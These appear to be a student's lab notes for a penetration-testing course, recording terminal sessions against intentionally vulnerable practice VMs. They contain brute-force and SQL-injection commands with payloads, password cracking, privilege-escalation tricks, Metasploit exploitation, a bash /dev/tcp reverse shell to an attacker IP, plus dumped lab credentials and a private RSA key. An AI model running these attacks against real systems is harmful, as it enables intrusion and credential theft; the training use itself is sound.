Acce
ACCE Notes
8/11
ports open: 80, 111, 777
http://192.168.0.25/
http://192.168.0.25/kzMb5nVYJw/index.php
http://192.168.0.25/kzMb5nVYJw/420search.php?usrtosearch=
Rocheston:~$ sudo hydra 192.168.0.25 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^&: invalid key" -P /usr/share/wordlists/rockyou.txt -la -t 16 -w 30
elite
Rocheston:~$ sudo sqlmap -u http://192.168.0.25/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth --dump --batch
___
__H__
___ ___["]_____ ___ ___ {1.3.2#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:12:14 /2023-11-08/
[07:12:14] [INFO] testing connection to the target URL
[07:12:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:12:14] [INFO] testing if the target URL content is stable
[07:12:15] [INFO] target URL content is stable
[07:12:15] [INFO] testing if GET parameter 'usrtosearch' is dynamic
[07:12:15] [WARNING] GET parameter 'usrtosearch' does not appear to be dynamic
[07:12:15] [INFO] heuristic (basic) test shows that GET parameter 'usrtosearch' might be injectable (possible DBMS: 'MySQL')
[07:12:15] [INFO] testing for SQL injection on GET parameter 'usrtosearch'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:12:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:12:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:12:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:12:15] [WARNING] reflective value(s) found and filtering out
[07:12:15] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:12:16] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[07:12:16] [INFO] GET parameter 'usrtosearch' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="ID")
[07:12:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:12:16] [INFO] GET parameter 'usrtosearch' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[07:12:16] [INFO] testing 'MySQL inline queries'
[07:12:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[07:12:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[07:12:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[07:12:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[07:12:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[07:12:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[07:12:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[07:12:16] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[07:12:36] [INFO] GET parameter 'usrtosearch' appears to be 'MySQL >= 5.0.12 OR time-based blind' injectable
[07:12:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:12:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:12:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:12:36] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[07:12:36] [INFO] target URL appears to have 3 columns in query
[07:12:36] [INFO] target URL appears to be UNION injectable with 3 columns
[07:12:36] [INFO] GET parameter 'usrtosearch' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[07:12:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'usrtosearch' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 161 HTTP(s) requests:
---
Parameter: usrtosearch (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: usrtosearch=1" OR NOT 2922=2922#
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: usrtosearch=1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178787a71,(SELECT (ELT(2894=2894,1))),0x717a627171,0x78))s), 8446744073709551610, 8446744073709551610)))-- GUFh
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: usrtosearch=1" OR SLEEP(5)-- PvNQ
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: usrtosearch=1" UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4170414b704d42586147574d6c78514c79504954755371506f464b54796851696777794555477358,0x717a627171),NULL#
---
[07:12:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[07:12:36] [INFO] fetching tables for database: 'seth'
[07:12:36] [INFO] fetching columns for table 'users' in database 'seth'
[07:12:36] [INFO] fetching entries for table 'users' in database 'seth'
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass | user | position |
+----+---------------------------------------------+--------+------------+
| 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> |
| 2 | --not allowed-- | isis | employee |
+----+---------------------------------------------+--------+------------+
Rocheston:~/rcce$ sudo echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input
Rocheston:~/rcce$ echo "c6d6bd7ebf806f43c76acc3681703b81" > hashpass.txt
Rocheston:~/rcce$ cat hashpass.txt
c6d6bd7ebf806f43c76acc3681703b81
Rocheston:~/rcce$ cd /pentest/password-recovery/johntheripper
Rocheston:/pentest/password-recovery/johntheripper$ sudo ./john /home/rocheston/rcce/hashpass --format=raw-md5 --wordlist:/usr/share/wordlists/rockyou.txt
stat: /home/rocheston/rcce/hashpass: No such file or directory
Rocheston:/pentest/password-recovery/johntheripper$ sudo ./john /home/rocheston/rcce/hashpass.txt --format=raw-md5 --wordlist:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
omega
Rocheston:~/rcce$ sudo ssh ramses@192.168.0.25 -p 777
The authenticity of host '[192.168.0.25]:777 ([192.168.0.25]:777)' can't be established.
ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.0.25]:777' (ECDSA) to the list of known hosts.
ramses@192.168.0.25's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
ramses@NullByte:~$ cd /var/www/backup
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
1405 pts/0 00:00:00 procwatch
1406 pts/0 00:00:00 sh
1407 pts/0 00:00:00 ps
ramses@NullByte:/var/www/backup$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:/var/www/backup$ cd /root
-bash: cd: /root: Permission denied
ramses@NullByte:/var/www/backup$ echo "/bin/sh" > ps
ramses@NullByte:/var/www/backup$ chmod 777 ps
ramses@NullByte:/var/www/backup$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ramses@NullByte:/var/www/backup$ export PATH=.:$PATH
ramses@NullByte:/var/www/backup$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ramses@NullByte:/var/www/backup$ ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls
proof.txt
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----
#
RCCE Lvl2
31/10
RCCE Lvl2
Lab 17:
ifconfig
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.5.103 netmask 255.255.255.0 broadcast 192.168.5.255
Rocheston:~$ sudo arp-scan 192.168.5.0/24 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.25 08:00:27:07:a0:19 Cadmus Computer Systems
192.168.5.103 08:00:27:9d:09:41 Cadmus Computer Systems
Rocheston:~$ sudo nmap -sC -sV 192.168.5.25
ports open: 22,8000
Lab 16:
ifconfig
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.5.132 netmask 255.255.255.0 broadcast 192.168.5.255
Rocheston:~$ sudo arp-scan 192.168.5.0/24 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.25 08:00:27:07:a0:19 Cadmus Computer Systems
192.168.5.132 08:00:27:0a:75:ad Cadmus Computer Systems
Rocheston:~$ sudo nmap -sC -sV 192.168.5.25
ports open: 22,80,443
Rocheston:~$ sudo dirb http://192.168.5.25
==> DIRECTORY: http://192.168.5.25/test/
==> DIRECTORY: http://192.168.5.25/uploads/
Rocheston:~$ sudo nano /etc/hosts
192.168.5.25 weakness.jth
Rocheston:~$ sudo dirb http://weakness.jth
---- Entering directory: http://weakness.jth/private/ ----
opening stuff in browser:
http://weakness.jth/private/files/notes.txt
this key was generated by openssl 0.9.8c-1
Rocheston:~$ sudo searchsploit openssl 0.9.8c-1
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Deriv | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Deriv | linux/remote/5632.rb
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Deriv | linux/remote/5720.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Rocheston:~$ sudo searchsploit -m 5622
Exploit: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)
URL: https://www.exploit-db.com/exploits/5622
Path: /usr/share/exploitdb/exploits/linux/remote/5622.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/rocheston/5622.txt
https://github.com/g0tmi1k/debian-ssh
Rocheston:~/downloads/rsa/2048$ sudo grep -r "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"
4161de56829de2fe64b9055711f531c1-2537.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster
4161de56829de2fe64b9055711f531c1-2537.pub
Rocheston:~/downloads/rsa/2048$ sudo ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.5.25
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Tue Aug 14 13:29:20 2018 from 192.168.209.1
n30@W34KN3SS:~$ ls
code user.txt
n30@W34KN3SS:~$ cat user.txt
25e3cd678875b601425c9356c8039f68
n30@W34KN3SS:~$ file code
code: python 2.7 byte-compiled
n30@W34KN3SS:~$ cp code /var/www/html
Rocheston:~$ sudo wget http://192.168.5.25/code
--2023-10-31 08:29:15-- http://192.168.5.25/code
Connecting to 192.168.5.25:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1138 (1.1K)
Saving to: ‘code’
code 100%[===================>] 1.11K --.-KB/s in 0s
2023-10-31 08:29:15 (121 MB/s) - ‘code’ saved [1138/1138]
Rocheston:~$ sudo mv code code.pyc
Rocheston:~$ sudo uncompyle6 code.pyc
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.16 (default, Sep 20 2023, 07:59:17)
# [GCC 8.3.0]
# Embedded file name: code.py
# Compiled at: 2018-05-08 11:50:54
import os, socket, time, hashlib
print ('[+]System Started at : {0}').format(time.ctime())
print '[+]This binary should generate unique hash for the hardcoded login info'
print '[+]Generating the hash ..'
inf = ''
inf += chr(ord('n'))
inf += chr(ord('3'))
inf += chr(ord('0'))
inf += chr(ord(':'))
inf += chr(ord('d'))
inf += chr(ord('M'))
inf += chr(ord('A'))
inf += chr(ord('S'))
inf += chr(ord('D'))
inf += chr(ord('N'))
inf += chr(ord('B'))
inf += chr(ord('!'))
inf += chr(ord('!'))
inf += chr(ord('#'))
inf += chr(ord('B'))
inf += chr(ord('!'))
inf += chr(ord('#'))
inf += chr(ord('!'))
inf += chr(ord('#'))
inf += chr(ord('3'))
inf += chr(ord('3'))
hashf = hashlib.sha256(inf + time.ctime()).hexdigest()
print ('[+]Your new hash is : {0}').format(hashf)
print '[+]Done'
# okay decompiling code.pyc
n30@W34KN3SS:~$ sudo -l
Matching Defaults entries for n30 on W34KN3SS:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User n30 may run the following commands on W34KN3SS:
(ALL : ALL) ALL
n30@W34KN3SS:~$ ls
code user.txt
n30@W34KN3SS:~$ sudo -i
root@W34KN3SS:~# ls
root.txt
root@W34KN3SS:~# cat root.txt
a1d2fab76ec6af9b651d4053171e042e
root@W34KN3SS:~#
28/10
RCCE Lvl2
Lab44: The aim of this exercise is to capture all the four flags.
Next part
msf6 > use exploit/unix/webapp/wp_slideshowgallery_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost 192.168.0.26
rhost => 192.168.0.26
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set lhost 192.168.0.102
lhost => 192.168.0.102
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog
targeturi => /weblog
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin
wp_user => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin
wp_password => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > exploit
[*] Started reverse TCP handler on 192.168.0.102:4444
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file hokjeifo.php
[*] Sending stage (39860 bytes) to 192.168.0.26
[+] Deleted hokjeifo.php
[*] Meterpreter session 1 opened (192.168.0.102:4444 -> 192.168.0.26:54288 ) at 2023-10-28 00:04:17 -0400
meterpreter > shell
Process 2120 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
</html/weblog/wp-content/uploads/slideshow-gallery$ su stinky
su stinky
Password: wedgie57
stinky@DeRPnStiNK:/var/www/html/weblog/wp-content/uploads/slideshow-gallery$ ls
<html/weblog/wp-content/uploads/slideshow-gallery$ ls
cache derp.png elidumfy.php jjtrmbtx.php
stinky@DeRPnStiNK:/var/www/html/weblog/wp-content/uploads/slideshow-gallery$ cd stinky
<html/weblog/wp-content/uploads/slideshow-gallery$ cd stinky
bash: cd: stinky: No such file or directory
stinky@DeRPnStiNK:/var/www/html/weblog/wp-content/uploads/slideshow-gallery$ cd
<html/weblog/wp-content/uploads/slideshow-gallery$ cd
stinky@DeRPnStiNK:~$ ls
ls
Desktop Documents Downloads ftp
stinky@DeRPnStiNK:~$ cd Deskto
cd Desktop/
stinky@DeRPnStiNK:~/Desktop$ ls
ls
flag.txt
stinky@DeRPnStiNK:~/Desktop$ cat flag
cat flag
cat: flag: No such file or directory
stinky@DeRPnStiNK:~/Desktop$ cat fla
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$ cd ..
cd ..
stinky@DeRPnStiNK:~$ cd Documents
cd Documents
stinky@DeRPnStiNK:~/Documents$ ls
ls
derpissues.pcap
stinky@DeRPnStiNK:~/Documents$ cd ..
cd ..
stinky@DeRPnStiNK:~$ cd Downloads
cd Downloads
stinky@DeRPnStiNK:~/Downloads$ ls
ls
stinky@DeRPnStiNK:~/Downloads$ ls -al
ls -al
total 8
drwxr-xr-x 2 stinky stinky 4096 Nov 13 2017 .
drwx------ 12 stinky stinky 4096 Jan 9 2018 ..
stinky@DeRPnStiNK:~/Downloads$ cd ..
cd ..
stinky@DeRPnStiNK:~$ cd ftp
cd ftp
stinky@DeRPnStiNK:~/ftp$ ls
ls
files
stinky@DeRPnStiNK:~/ftp$ cd files
cd files
stinky@DeRPnStiNK:~/ftp/files$ ls -al
ls -al
total 24
drwxr-xr-x 5 stinky stinky 4096 Nov 12 2017 .
drwxr-xr-x 3 nobody nogroup 4096 Nov 12 2017 ..
drwxr-xr-x 2 stinky stinky 4096 Nov 12 2017 network-logs
drwxr-xr-x 3 stinky stinky 4096 Nov 12 2017 ssh
-rwxr-xr-x 1 root root 17 Nov 12 2017 test.txt
drwxr-xr-x 2 root root 4096 Nov 12 2017 tmp
stinky@DeRPnStiNK:~/ftp/files$ cd network-logs
cd network-logs
stinky@DeRPnStiNK:~/ftp/files/network-logs$ ls
ls
derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ derpissues.txt
derpissues.txt
derpissues.txt: command not found
stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~/ftp/files/network-logs$ cd ../
cd ../
stinky@DeRPnStiNK:~/ftp/files$ cd ssh/ssh/ssh/ssh/ssh/ssh/ssh
cd ssh/ssh/ssh/ssh/ssh/ssh/ssh
stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ ls
ls
key.txt
stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ cat key
cat key
cat: key: No such file or directory
stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ cat key.txt
cat key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ cd ~/ftp/files
cd ~/ftp/files
stinky@DeRPnStiNK:~/ftp/files$ cp /home/stinky/Documents/derpissues.pcap .
cp /home/stinky/Documents/derpissues.pcap .
stinky@DeRPnStiNK:~/ftp/files$ ls
ls
derpissues.pcap network-logs ssh test.txt tmp
stinky@DeRPnStiNK:~/ftp/files$ cd /home
cd /home
stinky@DeRPnStiNK:/home$ su mrderp
su mrderp
Password: derpderpderpderpderpderpderp
mrderp@DeRPnStiNK:/home$ ls
ls
mrderp stinky
mrderp@DeRPnStiNK:/home$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp
Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:/home$ cd ..
cd ..
mrderp@DeRPnStiNK:/$ cd
cd
mrderp@DeRPnStiNK:~$ mkdir binaries
mkdir binaries
mrderp@DeRPnStiNK:~$ cd binaries
cd binaries
mrderp@DeRPnStiNK:~/binaries$ cat <<EOF > derpy.sh
cat <<EOF > derpy.sh
> #!/bin/bash
#!/bin/bash
> bash -i
bash -i
> EOF
EOF
mrderp@DeRPnStiNK:~/binaries$ ls
ls
derpy.sh
mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ ls
ls
derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# id
id
uid=0(root) gid=0(root) groups=0(root)
root@DeRPnStiNK:~/binaries# cd /root
cd /root
root@DeRPnStiNK:/root# ls
ls
Desktop Documents Downloads
root@DeRPnStiNK:/root# cd Desktop
cd Desktop
root@DeRPnStiNK:/root/Desktop# ls
ls
flag.txt
root@DeRPnStiNK:/root/Desktop# cat flag.txt
cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo
Lab43: The aim of this exercise is to gain root access and spot the flag
sudo dirb http://ip:8080/ -X .jsp
Next Enter command- sudo nikto -h http://ip
Enter URL http://192.168.0.26:8080/test.jsp
Enter command- ls -l /home and then click on Get listing Here we found username bill.
Next Enter command- ssh bill@localhost ls -al ~/ and then click on Get listing
Enter command- ssh bill@localhost sudo ufw disable and then click on Get listing.
Rocheston:~$ sudo arp-scan 192.168.0.0/24 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.26 08:00:27:07:a0:19 Cadmus Computer Systems
192.168.0.198 08:00:27:63:a8:e9 Cadmus Computer Systems
on 'http://192.168.0.26:8080/test.jsp' type into the website's search box the command below for the reverse shell
ssh bill@localhost /bin/bash -i >& /dev/tcp/192.168.0.198/4444 0>&1
Rocheston:~$ sudo nc -lvp 4444
listening on [any] 4444 ...
192.168.0.26: inverse host lookup failed: Unknown host
connect to [192.168.0.198] from (UNKNOWN) [192.168.0.26] 41110
bash: cannot set terminal process group (2915): Inappropriate ioctl for device
